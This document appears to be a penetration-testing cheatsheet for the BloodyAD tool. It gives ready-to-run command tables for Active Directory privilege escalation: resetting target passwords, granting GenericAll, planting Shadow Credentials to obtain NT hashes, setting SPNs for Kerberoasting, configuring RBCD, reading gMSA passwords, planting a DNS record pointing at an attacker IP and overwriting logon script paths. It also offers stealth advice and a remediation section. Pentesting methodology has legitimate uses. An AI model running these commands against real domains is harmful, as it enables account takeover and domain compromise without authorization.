Field Manual

Master BloodyAD

6 min read

πŸ›‘οΈ Methodology Checklist

  • Install via uv or pipx β€” keep it isolated from system Python
  • Confirm DC reachability + clock skew (Kerberos abuse breaks past 5 min drift)
  • Enumerate first: get writable --detail to see what the controlled principal can actually change
  • Map the right action to the abuse: add genericAll / set owner / add shadowCredentials / add rbcd / set servicePrincipalName
  • Prefer Shadow Credentials over password reset when the user is active (resets are noisy)
  • Clean up: revert SPNs, drop added group memberships, remove shadowCredentials when done

🎯 Operational Context

Use when: You have valid AD credentials (password, hash, or Kerberos ticket) and want a single Python tool that handles enumeration, ACL abuse, UAC flag flips, RBCD, Shadow Credentials, DNS record planting, and tombstone restore β€” all over LDAP without needing Windows. Think Dumber First: BloodyAD is a Swiss-army knife. get writable --detail tells you what’s possible; the verb (add / set / remove) tells you the action; the noun (genericAll, shadowCredentials, uac, rbcd, password, groupMember) tells you the abuse primitive. Skip when: You need Windows-only tooling (Rubeus, PowerView in-memory) or you’re outside a network path to LDAP/LDAPS on the DC.

⚑ Tactical Cheatsheet

Installation

CommandTactical Outcome
uv tool install bloodyADInstall via uv (isolated, fast)
pipx install bloodyADInstall via pipx (isolated venv)

Enumeration

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get object [TARGET_USER]Retrieve all attributes of a user
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get writable --detailList every object/attribute the controlled principal can write
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get writable --include-delInclude tombstoned objects in writable enumeration
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get bloodhoundCollect BloodHound data via BloodyAD
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get search -hShow extended LDAP search operations
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] -k get search -c 1.2.840.113556.1.4.2064 -c 1.2.840.113556.1.4.2065LDAP controls β€” display tombstoned objects

Credential & Account Modifications

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set password [TARGET_USER] [NEW_PASS]Reset target user’s password
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] remove uac [TARGET_USER] -f ACCOUNTDISABLEEnable a disabled account
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [OLD_UPN] userPrincipalName -v [NEW_UPN]Modify userPrincipalName
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get object [TARGET_USER] --attr userPrincipalNameVerify UPN change
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET_USER] mail -v newmail@test.localModify mail attribute

ACL & Privilege Abuse

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add genericAll [DN] [TARGET_USER]Grant target user GenericAll over object (by DN)
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add genericAll [SID] [TARGET_USER]Grant target user GenericAll over object (by SID)
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set owner [TARGET_GROUP] [TARGET_USER]WriteOwner β†’ take over an object
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add shadowCredentials [TARGET]Plant KeyCredentialLink β†’ PKINIT β†’ NT hash
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET] servicePrincipalName -v 'fake/spn'WriteSPN β†’ set up for Kerberoast

UAC Flag Manipulation

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] remove uac [TARGET_USER] -f ACCOUNTDISABLEClear ACCOUNTDISABLE flag
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add uac [TARGET_USER] -f TRUSTED_TO_AUTH_FOR_DELEGATIONSet TRUSTED_TO_AUTH_FOR_DELEGATION (S4U2Self abuse)

Group Operations

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add groupMember [TARGET_GROUP] [NEW_MEMBER]Add member to group
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET_GROUP] groupType -v -2147483644Change group type to Domain Local

gMSA Password Recovery

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get object [TARGET_USER] --attr msDS-ManagedPasswordRead gMSA managed password
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get search --filter '(sAMAccountName=[GMSA_NAME]$)' --attr 'msDS-ManagedPassword,msDS-ManagedPasswordId,sAMAccountName' --rawRaw msDS-ManagedPassword blob via search filter

MachineAccountQuota

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] get object 'DC=[DOMAIN],DC=[TLD]' --attr ms-DS-MachineAccountQuotaEnumerate MAQ
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object 'DC=[DOMAIN],DC=[TLD]' ms-DS-MachineAccountQuota -v 10Set MAQ to 10

Object Lifecycle

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add computer [COMPUTER] [COMPUTER_PASS]Create a new computer account
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] -k set restore [TARGET_USER]Restore a deleted (tombstoned) object

Delegation & Coercion Setup

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add rbcd '[DELEGATE_TO]$' '[DELEGATE_FROM]$'Add Resource-Based Constrained Delegation
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] add dnsRecord [RECORD] [ATTACKER_IP]Register a DNS record (relay / coercion targets)
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [DN] scriptPath -v [FILE]Overwrite logon script path

ESC14B (altSecurityIdentities)

CommandTactical Outcome
bloodyAD --host [DC] -d [DOMAIN] -u [USER] -p [PASS] set object [TARGET_USER] altSecurityIdentities -v 'X509:<RFC822>user@test.local'Bind a certificate identity to a target user (ESC14B)

πŸ“ Notes

  • Pass -k to use Kerberos authentication.
  • Pass an NT hash instead of a password using -p :[NTLM_HASH].
  • Specify the credential format for --password or -k using -f, e.g. -f rc4.

πŸ› οΈ Troubleshooting & Edge Cases

ProblemCauseFix
LDAP bind fails over plaintextDC enforces LDAP signing / channel bindingUse --ldaps, or Kerberos with -k
KRB_AP_ERR_SKEWClock drift > 5 min from DCsudo ntpdate [DC] or sudo rdate -n [DC]
add computer fails with quota errorms-DS-MachineAccountQuota exhausted for this userUse a different account or raise MAQ if you have rights on the domain object
add shadowCredentials failsDC has no NTAuth cert / PKINIT not configuredFall back to targeted Kerberoast or password reset
get writable returns nothingStale BloodHound data β€” rights were revoked or principal lacks reachRe-enumerate with a different ingestion path; check inheritance and explicit DENY
set restore failsUser missing the Reanimate-Tombstones extended rightUse a principal with that right (typically Domain Admins)

πŸ“ Reporting Trigger

Finding Title: Active Directory Object Modification Permissions Enable Privilege Escalation via BloodyAD Impact: Excessive write permissions across AD objects allow lower-privileged principals to perform ACL abuse, plant Shadow Credentials, configure RBCD, modify UAC flags, register DNS records, and restore tombstoned objects β€” all from a single Python tool with no Windows host required. Root Cause: Permissions delegated without least-privilege review; non-zero ms-DS-MachineAccountQuota; missing LDAP signing / channel binding; lack of monitoring for msDS-KeyCredentialLink, servicePrincipalName, and userAccountControl modifications. Recommendation: Audit writable attributes on Tier 0 objects. Set ms-DS-MachineAccountQuota = 0. Enforce LDAP signing + channel binding. Alert on KeyCredentialLink writes, SPN changes, UAC flag toggles (TRUSTED_TO_AUTH_FOR_DELEGATION), and RBCD additions.

πŸ”— Related Nodes

Graph View

Backlinks